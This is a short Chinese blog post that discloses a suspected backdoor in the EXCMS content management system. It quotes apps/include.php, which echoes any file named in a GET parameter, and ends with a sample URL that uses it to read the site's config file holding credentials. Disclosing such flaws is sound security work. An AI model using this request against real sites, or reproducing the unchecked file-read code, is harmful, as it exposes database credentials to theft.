EXCMS疑似後門

某天遇到Excms的系統，官網http://www.excms.cn/

 

 於GG搜索excms漏洞，發現分析是做者明顯藏有後門的漏洞。

下載源碼分析，很明顯就能找到另外一個疑似後門的漏洞（爲何說疑似？由於也不能肯定，說不定就是有這樣的程序員，呵呵。。）

 

 漏洞文件：

apps/include.php - 

 源碼：

//加載系統配置文件 - 

 require_once('../configuration/inc/common.inc.php');

 

$file = $_GET['file'];

 if($file!='' && file_exists(EXCMS_PATH.$file)){

        echo file_get_contents(EXCMS_PATH.$file);

 

 不用看就知道了吧，呵呵。。。

 

http://hellxman.blog.51cto.com/apps/include.php?file=sitedata/config.inc.php